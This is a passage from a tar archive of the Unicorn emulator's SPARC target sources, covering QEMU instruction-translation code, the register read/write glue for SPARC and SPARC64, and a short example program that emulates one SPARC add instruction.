gen_dest_fpr_D(dc, rd); tcg_gen_qemu_ld_i64(tcg_ctx, cpu_dst_64, cpu_addr, dc->mem_idx, MO_TEQ | MO_ALIGN_4); gen_store_fpr_D(dc, rd, cpu_dst_64); break; default: goto illegal_insn; } } else if (xop < 8 || (xop >= 0x14 && xop < 0x18) || xop == 0xe || xop == 0x1e) { TCGv cpu_val = gen_load_gpr(dc, rd); switch (xop) { case 0x4: /* st, store word */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_st32(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x5: /* stb, store byte */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_st8(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x6: /* sth, store halfword */ 
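/* Plain stores mask the address first when 32-bit addressing is in effect. */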
gen_address_mask(dc, cpu_addr); tcg_gen_qemu_st16(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x7: /* std, store double word */ if (rd & 1) goto illegal_insn; else { TCGv_i64 t64; TCGv lo; gen_address_mask(dc, cpu_addr); lo = gen_load_gpr(dc, rd + 1); t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_tl_i64(tcg_ctx, t64, lo, cpu_val); tcg_gen_qemu_st64(tcg_ctx, t64, cpu_addr, dc->mem_idx); tcg_temp_free_i64(tcg_ctx, t64); } break; case 0x14: /* sta, V9 stwa, store word alternate */ gen_st_asi(dc, cpu_val, cpu_addr, insn, MO_TEUL); break; case 0x15: /* stba, store byte alternate */ gen_st_asi(dc, cpu_val, cpu_addr, insn, MO_UB); break; case 0x16: /* stha, store halfword alternate */ gen_st_asi(dc, cpu_val, cpu_addr, insn, MO_TEUW); break; case 0x17: /* stda, store double word alternate */ if (rd & 1) { goto illegal_insn; } gen_stda_asi(dc, cpu_val, cpu_addr, insn, rd); break; #ifdef TARGET_SPARC64 case 0x0e: /* V9 stx */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_st64(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x1e: /* V9 stxa */ gen_st_asi(dc, cpu_val, cpu_addr, insn, MO_TEQ); break; #endif default: goto illegal_insn; } } else if (xop > 0x23 && xop < 0x28) { if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } switch (xop) { case 0x24: /* stf, store fpreg */ gen_address_mask(dc, cpu_addr); cpu_src1_32 = gen_load_fpr_F(dc, rd); tcg_gen_qemu_st_i32(tcg_ctx, cpu_src1_32, cpu_addr, dc->mem_idx, MO_TEUL); break; case 0x25: /* stfsr, V9 stxfsr */ { #ifdef TARGET_SPARC64 gen_address_mask(dc, cpu_addr); if (rd == 1) { tcg_gen_qemu_st64(tcg_ctx, tcg_ctx->cpu_fsr, cpu_addr, dc->mem_idx); break; } #endif tcg_gen_qemu_st32(tcg_ctx, tcg_ctx->cpu_fsr, cpu_addr, dc->mem_idx); } break; case 0x26: #ifdef TARGET_SPARC64 /* V9 stqf, store quad fpreg */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_address_mask(dc, cpu_addr); /* ??? While stqf only requires 4-byte alignment, it is legal for the cpu to signal the unaligned exception. The OS trap handler is then required to fix it up. For qemu, this avoids having to probe the second page before performing the first write. 
*/ cpu_src1_64 = gen_load_fpr_Q0(dc, rd); tcg_gen_qemu_st_i64(tcg_ctx, cpu_src1_64, cpu_addr, dc->mem_idx, MO_TEQ | MO_ALIGN_16); tcg_gen_addi_tl(tcg_ctx, cpu_addr, cpu_addr, 8); cpu_src2_64 = gen_load_fpr_Q1(dc, rd); tcg_gen_qemu_st_i64(tcg_ctx, cpu_src2_64, cpu_addr, dc->mem_idx, MO_TEQ); break; #else /* !TARGET_SPARC64 */ /* stdfq, store floating point queue */ if (!supervisor(dc)) goto priv_insn; if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } goto nfq_insn; #endif case 0x27: /* stdf, store double fpreg */ gen_address_mask(dc, cpu_addr); cpu_src1_64 = gen_load_fpr_D(dc, rd); tcg_gen_qemu_st_i64(tcg_ctx, cpu_src1_64, cpu_addr, dc->mem_idx, MO_TEQ | MO_ALIGN_4); break; default: goto illegal_insn; } } else if (xop > 0x33 && xop < 0x3f) { switch (xop) { #ifdef TARGET_SPARC64 case 0x34: /* V9 stfa */ if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_stf_asi(dc, cpu_addr, insn, 4, rd); break; case 0x36: /* V9 stqfa */ { CHECK_FPU_FEATURE(dc, FLOAT128); if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_stf_asi(dc, cpu_addr, insn, 16, QFPREG(rd)); } break; case 0x37: /* V9 stdfa */ if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_stf_asi(dc, cpu_addr, insn, 8, DFPREG(rd)); break; case 0x3e: /* V9 casxa */ rs2 = GET_FIELD(insn, 27, 31); cpu_src2 = gen_load_gpr(dc, rs2); gen_casx_asi(dc, cpu_addr, cpu_src2, insn, rd); break; #else case 0x34: /* stc */ case 0x35: /* stcsr */ case 0x36: /* stdcq */ case 0x37: /* stdc */ goto ncp_insn; #endif case 0x3c: /* V9 or LEON3 casa */ #ifndef TARGET_SPARC64 CHECK_IU_FEATURE(dc, CASA); #endif rs2 = GET_FIELD(insn, 27, 31); cpu_src2 = gen_load_gpr(dc, rs2); gen_cas_asi(dc, cpu_addr, cpu_src2, insn, rd); break; default: goto illegal_insn; } } else { goto illegal_insn; } } break; } /* default case for non jump instructions */ if (dc->npc == DYNAMIC_PC) { dc->pc = DYNAMIC_PC; gen_op_next_insn(tcg_ctx); } else if (dc->npc == JUMP_PC) { /* we can do a static jump */ gen_branch2(dc, dc->jump_pc[0], dc->jump_pc[1], tcg_ctx->cpu_cond); dc->base.is_jmp = DISAS_NORETURN; } else { dc->pc = dc->npc; dc->npc = dc->npc + 4; } jmp_insn: goto egress; illegal_insn: gen_exception(dc, TT_ILL_INSN); goto egress; unimp_flush: gen_exception(dc, TT_UNIMP_FLUSH); goto egress; priv_insn: gen_exception(dc, TT_PRIV_INSN); goto egress; nfpu_insn: gen_op_fpexception_im(dc, FSR_FTT_UNIMPFPOP); goto egress; #if !defined(TARGET_SPARC64) nfq_insn: gen_op_fpexception_im(dc, FSR_FTT_SEQ_ERROR); goto egress; #endif #ifndef TARGET_SPARC64 ncp_insn: gen_exception(dc, TT_NCP_INSN); goto egress; #endif egress: if (dc->n_t32 != 0) { int i; for (i = dc->n_t32 - 1; i >= 0; --i) { tcg_temp_free_i32(tcg_ctx, dc->t32[i]); } dc->n_t32 = 0; } if (dc->n_ttl != 0) { int i; for (i = dc->n_ttl - 1; i >= 0; --i) { tcg_temp_free(tcg_ctx, dc->ttl[i]); } dc->n_ttl = 0; } } static void sparc_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cs) { DisasContext *dc = container_of(dcbase, DisasContext, base); CPUSPARCState *env = cs->env_ptr; int bound; // unicorn setup dc->uc = cs->uc; dc->pc = dc->base.pc_first; dc->npc = (target_ulong)dc->base.tb->cs_base; dc->cc_op = CC_OP_DYNAMIC; dc->mem_idx = dc->base.tb->flags & TB_FLAG_MMU_MASK; dc->def = &env->def; dc->fpu_enabled = tb_fpu_enabled(dc->base.tb->flags); dc->address_mask_32bit = tb_am_enabled(dc->base.tb->flags); dc->supervisor = (dc->base.tb->flags & TB_FLAG_SUPER) != 0; #ifdef TARGET_SPARC64 dc->fprs_dirty = 0; dc->asi = (dc->base.tb->flags >> TB_FLAG_ASI_SHIFT) & 0xff; #endif /* * if we reach a page boundary, we stop generation so that the * PC of a
TT_TFAULT exception is always in the right page */ #ifdef _MSC_VER bound = (0 - (dc->base.pc_first | TARGET_PAGE_MASK)) / 4; #else bound = -(dc->base.pc_first | TARGET_PAGE_MASK) / 4; #endif dc->base.max_insns = MIN(dc->base.max_insns, bound); } static void sparc_tr_tb_start(DisasContextBase *db, CPUState *cs) { } static void sparc_tr_insn_start(DisasContextBase *dcbase, CPUState *cs) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (dc->npc & JUMP_PC) { assert(dc->jump_pc[1] == dc->pc + 4); tcg_gen_insn_start(tcg_ctx, dc->pc, dc->jump_pc[0] | JUMP_PC); } else { tcg_gen_insn_start(tcg_ctx, dc->pc, dc->npc); } } static bool sparc_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cs, const CPUBreakpoint *bp) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (dc->pc != dc->base.pc_first) { save_state(dc); } gen_helper_debug(tcg_ctx, tcg_ctx->cpu_env); tcg_gen_exit_tb(tcg_ctx, NULL, 0); dc->base.is_jmp = DISAS_NORETURN; /* update pc_next so that the current instruction is included in tb->size */ dc->base.pc_next += 4; return true; } static void sparc_tr_translate_insn(DisasContextBase *dcbase, CPUState *cs) { DisasContext *dc = container_of(dcbase, DisasContext, base); struct uc_struct *uc = dc->uc; TCGContext *tcg_ctx = uc->tcg_ctx; CPUSPARCState *env = cs->env_ptr; unsigned int insn; // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(uc, dc->pc)) { #ifndef TARGET_SPARC64 gen_helper_power_down(tcg_ctx, tcg_ctx->cpu_env); #endif dcbase->is_jmp = DISAS_NORETURN; return; } // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_CODE, dc->pc)) { // Sync PC in advance tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, dc->pc); gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, uc, dc->pc); // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } insn = translator_ldl(tcg_ctx, env, dc->pc); dc->base.pc_next += 4; disas_sparc_insn(dc, insn); if (dc->base.is_jmp == DISAS_NORETURN) { return; } if (dc->pc != dc->base.pc_next) { dc->base.is_jmp = DISAS_TOO_MANY; } } static void sparc_tr_tb_stop(DisasContextBase *dcbase, CPUState *cs) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; switch (dc->base.is_jmp) { case DISAS_NEXT: case DISAS_TOO_MANY: if (dc->pc != DYNAMIC_PC && (dc->npc != DYNAMIC_PC && dc->npc != JUMP_PC)) { /* static PC and NPC: we can use direct chaining */ gen_goto_tb(dc, 0, dc->pc, dc->npc); } else { if (dc->pc != DYNAMIC_PC) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, dc->pc); } save_npc(dc); tcg_gen_exit_tb(tcg_ctx, NULL, 0); } break; case DISAS_NORETURN: break; case DISAS_EXIT: /* Exit TB */ save_state(dc); tcg_gen_exit_tb(tcg_ctx, NULL, 0); break; default: g_assert_not_reached(); } } static const TranslatorOps sparc_tr_ops = { .init_disas_context = sparc_tr_init_disas_context, .tb_start = sparc_tr_tb_start, .insn_start = sparc_tr_insn_start, .breakpoint_check = sparc_tr_breakpoint_check, .translate_insn = sparc_tr_translate_insn, .tb_stop = sparc_tr_tb_stop, }; void gen_intermediate_code(CPUState *cs, TranslationBlock *tb, int max_insns) { DisasContext dc = { 0 }; translator_loop(&sparc_tr_ops, &dc.base, cs, tb, max_insns); } void sparc_tcg_init(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; static const char gregnames[32][4] = { "g0", "g1", "g2", "g3", "g4", "g5", "g6", "g7", "o0", "o1", "o2", "o3", "o4", "o5", "o6", "o7", "l0", "l1", "l2", 
"l3", "l4", "l5", "l6", "l7", "i0", "i1", "i2", "i3", "i4", "i5", "i6", "i7", }; static const char fregnames[32][4] = { "f0", "f2", "f4", "f6", "f8", "f10", "f12", "f14", "f16", "f18", "f20", "f22", "f24", "f26", "f28", "f30", "f32", "f34", "f36", "f38", "f40", "f42", "f44", "f46", "f48", "f50", "f52", "f54", "f56", "f58", "f60", "f62", }; static struct { TCGv_i32 *ptr; int off; const char *name; } r32[] = { { NULL /* &tcg_ctx->cpu_cc_op */, offsetof(CPUSPARCState, cc_op), "cc_op" }, { NULL /* &tcg_ctx->cpu_psr */, offsetof(CPUSPARCState, psr), "psr" }, #ifdef TARGET_SPARC64 { NULL /* &tcg_ctx->cpu_xcc */, offsetof(CPUSPARCState, xcc), "xcc" }, { NULL /* &tcg_ctx->cpu_fprs */, offsetof(CPUSPARCState, fprs), "fprs" }, #else { NULL /* &tcg_ctx->cpu_wim */, offsetof(CPUSPARCState, wim), "wim" }, #endif }; static struct { TCGv *ptr; int off; const char *name; } rtl[] = { { NULL /* &tcg_ctx->cpu_cond */, offsetof(CPUSPARCState, cond), "cond" }, { NULL /* &tcg_ctx->cpu_cc_src */, offsetof(CPUSPARCState, cc_src), "cc_src" }, { NULL /* &tcg_ctx->cpu_cc_src2 */, offsetof(CPUSPARCState, cc_src2), "cc_src2" }, { NULL /* &tcg_ctx->cpu_cc_dst */, offsetof(CPUSPARCState, cc_dst), "cc_dst" }, { NULL /* &tcg_ctx->cpu_fsr */, offsetof(CPUSPARCState, fsr), "fsr" }, { NULL /* &tcg_ctx->cpu_pc */, offsetof(CPUSPARCState, pc), "pc" }, { NULL /* &tcg_ctx->cpu_npc */, offsetof(CPUSPARCState, npc), "npc" }, { NULL /* &tcg_ctx->cpu_y */, offsetof(CPUSPARCState, y), "y" }, { NULL /* &tcg_ctx->cpu_tbr */, offsetof(CPUSPARCState, tbr), "tbr" }, #ifdef TARGET_SPARC64 { NULL /* &tcg_ctx->cpu_gsr */, offsetof(CPUSPARCState, gsr), "gsr" }, { NULL /* &tcg_ctx->cpu_tick_cmpr */, offsetof(CPUSPARCState, tick_cmpr), "tick_cmpr" }, { NULL /* &tcg_ctx->cpu_stick_cmpr */, offsetof(CPUSPARCState, stick_cmpr), "stick_cmpr" }, { NULL /* &tcg_ctx->cpu_hstick_cmpr */, offsetof(CPUSPARCState, hstick_cmpr), "hstick_cmpr" }, { NULL /* &tcg_ctx->cpu_hintp */, offsetof(CPUSPARCState, hintp), "hintp" }, { NULL /* &tcg_ctx->cpu_htba */, offsetof(CPUSPARCState, htba), "htba" }, { NULL /* &tcg_ctx->cpu_hver */, offsetof(CPUSPARCState, hver), "hver" }, { NULL /* &tcg_ctx->cpu_ssr */, offsetof(CPUSPARCState, ssr), "ssr" }, { NULL /* &tcg_ctx->cpu_ver */, offsetof(CPUSPARCState, version), "ver" }, #endif }; unsigned int i; r32[0].ptr = &tcg_ctx->cpu_cc_op; r32[1].ptr = &tcg_ctx->cpu_psr; #ifdef TARGET_SPARC64 r32[2].ptr = &tcg_ctx->cpu_xcc; r32[3].ptr = &tcg_ctx->cpu_fprs; #else r32[2].ptr = &tcg_ctx->cpu_wim; #endif rtl[0].ptr = &tcg_ctx->cpu_cond; rtl[1].ptr = &tcg_ctx->cpu_cc_src; rtl[2].ptr = &tcg_ctx->cpu_cc_src2; rtl[3].ptr = &tcg_ctx->cpu_cc_dst; rtl[4].ptr = &tcg_ctx->cpu_fsr; rtl[5].ptr = &tcg_ctx->cpu_pc; rtl[6].ptr = &tcg_ctx->cpu_npc; rtl[7].ptr = &tcg_ctx->cpu_y; rtl[8].ptr = &tcg_ctx->cpu_tbr; #ifdef TARGET_SPARC64 rtl[9].ptr = &tcg_ctx->cpu_gsr; rtl[10].ptr = &tcg_ctx->cpu_tick_cmpr; rtl[11].ptr = &tcg_ctx->cpu_stick_cmpr; rtl[12].ptr = &tcg_ctx->cpu_hstick_cmpr; rtl[13].ptr = &tcg_ctx->cpu_hintp; rtl[14].ptr = &tcg_ctx->cpu_htba; rtl[15].ptr = &tcg_ctx->cpu_hver; rtl[16].ptr = &tcg_ctx->cpu_ssr; rtl[17].ptr = &tcg_ctx->cpu_ver; #endif tcg_ctx->cpu_regwptr = tcg_global_mem_new_ptr(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUSPARCState, regwptr), "regwptr"); for (i = 0; i < ARRAY_SIZE(r32); ++i) { *r32[i].ptr = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, r32[i].off, r32[i].name); } for (i = 0; i < ARRAY_SIZE(rtl); ++i) { *rtl[i].ptr = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, rtl[i].off, rtl[i].name); } tcg_ctx->cpu_regs[0] = 
NULL; for (i = 1; i < 8; ++i) { tcg_ctx->cpu_regs[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUSPARCState, gregs[i]), gregnames[i]); } for (i = 8; i < 32; ++i) { tcg_ctx->cpu_regs[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_regwptr, (i - 8) * sizeof(target_ulong), gregnames[i]); } for (i = 0; i < TARGET_DPREGS; i++) { tcg_ctx->cpu_fpr[i] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUSPARCState, fpr[i]), fregnames[i]); } } void restore_state_to_opc(CPUSPARCState *env, TranslationBlock *tb, target_ulong *data) { target_ulong pc = data[0]; target_ulong npc = data[1]; env->pc = pc; if (npc == DYNAMIC_PC) { /* dynamic NPC: already stored */ } else if (npc & JUMP_PC) { /* jump PC: use 'cond' and the jump targets of the translation */ if (env->cond) { env->npc = npc & ~3; } else { env->npc = pc + 4; } } else { env->npc = npc; } } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/unicorn.c�����������������������������������������������������������0000664�0000000�0000000�00000010442�14675241067�0020373�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "sysemu/cpus.h" #include "cpu.h" #include "unicorn_common.h" #include "uc_priv.h" #include "unicorn.h" static bool sparc_stop_interrupt(struct uc_struct *uc, int intno) { switch (intno) { default: return false; case TT_ILL_INSN: return true; } } static void sparc_set_pc(struct uc_struct *uc, uint64_t address) { ((CPUSPARCState *)uc->cpu->env_ptr)->pc = address; ((CPUSPARCState *)uc->cpu->env_ptr)->npc = address + 4; } static uint64_t sparc_get_pc(struct uc_struct *uc) { return ((CPUSPARCState *)uc->cpu->env_ptr)->pc; } static void sparc_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; SPARCCPU *cpu = (SPARCCPU *)tcg_ctx->uc->cpu; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } } static void reg_reset(struct uc_struct *uc) { CPUArchState *env = uc->cpu->env_ptr; memset(env->gregs, 0, sizeof(env->gregs)); memset(env->fpr, 0, sizeof(env->fpr)); memset(env->regbase, 0, sizeof(env->regbase)); env->pc = 0; env->npc = 0; env->regwptr = env->regbase; } DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUSPARCState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_SPARC_REG_G0 && regid <= UC_SPARC_REG_G7) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->gregs[regid - UC_SPARC_REG_G0]; } else if (regid >= UC_SPARC_REG_O0 && regid <= UC_SPARC_REG_O7) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->regwptr[regid - UC_SPARC_REG_O0]; } else if (regid >= UC_SPARC_REG_L0 && regid <= 
UC_SPARC_REG_L7) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->regwptr[8 + regid - UC_SPARC_REG_L0]; } else if (regid >= UC_SPARC_REG_I0 && regid <= UC_SPARC_REG_I7) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->regwptr[16 + regid - UC_SPARC_REG_I0]; } else { switch (regid) { default: break; case UC_SPARC_REG_PC: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->pc; break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUSPARCState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_SPARC_REG_G0 && regid <= UC_SPARC_REG_G7) { CHECK_REG_TYPE(uint32_t); env->gregs[regid - UC_SPARC_REG_G0] = *(uint32_t *)value; } else if (regid >= UC_SPARC_REG_O0 && regid <= UC_SPARC_REG_O7) { CHECK_REG_TYPE(uint32_t); env->regwptr[regid - UC_SPARC_REG_O0] = *(uint32_t *)value; } else if (regid >= UC_SPARC_REG_L0 && regid <= UC_SPARC_REG_L7) { CHECK_REG_TYPE(uint32_t); env->regwptr[8 + regid - UC_SPARC_REG_L0] = *(uint32_t *)value; } else if (regid >= UC_SPARC_REG_I0 && regid <= UC_SPARC_REG_I7) { CHECK_REG_TYPE(uint32_t); env->regwptr[16 + regid - UC_SPARC_REG_I0] = *(uint32_t *)value; } else { switch (regid) { default: break; case UC_SPARC_REG_PC: CHECK_REG_TYPE(uint32_t); env->pc = *(uint32_t *)value; env->npc = *(uint32_t *)value + 4; *setpc = 1; break; } } return ret; } static int sparc_cpus_init(struct uc_struct *uc, const char *cpu_model) { SPARCCPU *cpu; cpu = cpu_sparc_init(uc); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->release = sparc_release; uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->set_pc = sparc_set_pc; uc->get_pc = sparc_get_pc; uc->stop_interrupt = sparc_stop_interrupt; uc->cpus_init = sparc_cpus_init; uc->cpu_context_size = offsetof(CPUSPARCState, irq_manager); uc_common_init(uc); }
unicorn-2.1.1/qemu/target/sparc/unicorn.h
/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ #ifndef UC_QEMU_TARGET_SPARC_H #define UC_QEMU_TARGET_SPARC_H // functions to read & write registers uc_err reg_read_sparc(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_read_sparc64(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_write_sparc(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); uc_err reg_write_sparc64(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); void uc_init_sparc(struct uc_struct *uc); void uc_init_sparc64(struct uc_struct *uc); #endif
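/*
 * Illustrative usage sketch (not part of the original tree): the reg_read/
 * reg_write/uc_init hooks above are what Unicorn's public API dispatches to
 * for UC_ARCH_SPARC. The standalone program below is a minimal sketch of
 * that path; the mapping address, register values, and the big-endian
 * encoding 0x86004002 for "add %g1, %g2, %g3" are assumptions for the demo,
 * and error checking is elided for brevity.
 */
#include <unicorn/unicorn.h>
#include <stdio.h>

int main(void)
{
    uc_engine *uc;
    /* "add %g1, %g2, %g3", SPARC V8, big-endian byte order */
    const uint8_t code[] = {0x86, 0x00, 0x40, 0x02};
    uint32_t g1 = 0x1230, g2 = 0x6789, g3 = 0;
    const uint64_t base = 0x10000;

    uc_open(UC_ARCH_SPARC, UC_MODE_SPARC32 | UC_MODE_BIG_ENDIAN, &uc);
    uc_mem_map(uc, base, 0x1000, UC_PROT_ALL);  /* one page for the code */
    uc_mem_write(uc, base, code, sizeof(code));
    uc_reg_write(uc, UC_SPARC_REG_G1, &g1);     /* lands in env->gregs[1] */
    uc_reg_write(uc, UC_SPARC_REG_G2, &g2);     /* lands in env->gregs[2] */
    uc_emu_start(uc, base, base + sizeof(code), 0, 0);
    uc_reg_read(uc, UC_SPARC_REG_G3, &g3);      /* reads env->gregs[3] */
    printf("g3 = 0x%x\n", g3);                  /* expect 0x79b9 */
    uc_close(uc);
    return 0;
}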
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/unicorn64.c���������������������������������������������������������0000664�0000000�0000000�00000011411�14675241067�0020542�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "sysemu/cpus.h" #include "cpu.h" #include "unicorn_common.h" #include "uc_priv.h" #include "unicorn.h" const int SPARC64_REGS_STORAGE_SIZE = offsetof(CPUSPARCState, irq_manager); static bool sparc_stop_interrupt(struct uc_struct *uc, int intno) { switch(intno) { default: return false; case TT_ILL_INSN: return true; } } static void sparc_set_pc(struct uc_struct *uc, uint64_t address) { ((CPUSPARCState *)uc->cpu->env_ptr)->pc = address; ((CPUSPARCState *)uc->cpu->env_ptr)->npc = address + 4; } static uint64_t sparc_get_pc(struct uc_struct *uc) { return ((CPUSPARCState *)uc->cpu->env_ptr)->pc; } static void sparc_release(void *ctx) { release_common(ctx); #if 0 int i; TCGContext *tcg_ctx = (TCGContext *) ctx; SPARCCPU *cpu = SPARC_CPU(tcg_ctx->uc->cpu); CPUSPARCState *env = &cpu->env; g_free(tcg_ctx->cpu_wim); g_free(tcg_ctx->cpu_cond); g_free(tcg_ctx->cpu_cc_src); g_free(tcg_ctx->cpu_cc_src2); g_free(tcg_ctx->cpu_cc_dst); g_free(tcg_ctx->cpu_fsr); g_free(tcg_ctx->sparc_cpu_pc); g_free(tcg_ctx->cpu_npc); g_free(tcg_ctx->cpu_y); g_free(tcg_ctx->cpu_tbr); for (i = 0; i < 8; i++) { g_free(tcg_ctx->cpu_gregs[i]); } for (i = 0; i < 32; i++) { g_free(tcg_ctx->cpu_gpr[i]); } g_free(tcg_ctx->cpu_PC); g_free(tcg_ctx->btarget); g_free(tcg_ctx->bcond); g_free(tcg_ctx->cpu_dspctrl); g_free(tcg_ctx->tb_ctx.tbs); g_free(env->def); #endif } static void reg_reset(struct uc_struct *uc) { CPUArchState *env = uc->cpu->env_ptr; memset(env->gregs, 0, sizeof(env->gregs)); memset(env->fpr, 0, sizeof(env->fpr)); memset(env->regbase, 0, sizeof(env->regbase)); env->pc = 0; env->npc = 0; env->regwptr = env->regbase; } DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUSPARCState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_SPARC_REG_G0 && regid <= UC_SPARC_REG_G7) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->gregs[regid - UC_SPARC_REG_G0]; } else if (regid >= UC_SPARC_REG_O0 && regid <= UC_SPARC_REG_O7) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regwptr[regid - UC_SPARC_REG_O0]; } else if (regid >= UC_SPARC_REG_L0 && regid <= UC_SPARC_REG_L7) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regwptr[8 + regid - UC_SPARC_REG_L0]; } else if (regid >= UC_SPARC_REG_I0 && regid <= UC_SPARC_REG_I7) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regwptr[16 + regid - UC_SPARC_REG_I0]; } else { switch(regid) { default: break; case UC_SPARC_REG_PC: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->pc; break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, 
size_t *size, int *setpc) { CPUSPARCState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_SPARC_REG_G0 && regid <= UC_SPARC_REG_G7) { CHECK_REG_TYPE(uint64_t); env->gregs[regid - UC_SPARC_REG_G0] = *(uint64_t *)value; } else if (regid >= UC_SPARC_REG_O0 && regid <= UC_SPARC_REG_O7) { CHECK_REG_TYPE(uint64_t); env->regwptr[regid - UC_SPARC_REG_O0] = *(uint64_t *)value; } else if (regid >= UC_SPARC_REG_L0 && regid <= UC_SPARC_REG_L7) { CHECK_REG_TYPE(uint64_t); env->regwptr[8 + regid - UC_SPARC_REG_L0] = *(uint64_t *)value; } else if (regid >= UC_SPARC_REG_I0 && regid <= UC_SPARC_REG_I7) { CHECK_REG_TYPE(uint64_t); env->regwptr[16 + regid - UC_SPARC_REG_I0] = *(uint64_t *)value; } else { switch(regid) { default: break; case UC_SPARC_REG_PC: CHECK_REG_TYPE(uint64_t); env->pc = *(uint64_t *)value; env->npc = *(uint64_t *)value + 4; *setpc = 1; break; } } return ret; } static int sparc_cpus_init(struct uc_struct *uc, const char *cpu_model) { SPARCCPU *cpu; cpu = cpu_sparc_init(uc); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->release = sparc_release; uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->set_pc = sparc_set_pc; uc->get_pc = sparc_get_pc; uc->stop_interrupt = sparc_stop_interrupt; uc->cpus_init = sparc_cpus_init; uc_common_init(uc); } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/vis_helper.c��������������������������������������������������������0000664�0000000�0000000�00000035476�14675241067�0021074�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * VIS op helpers * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later 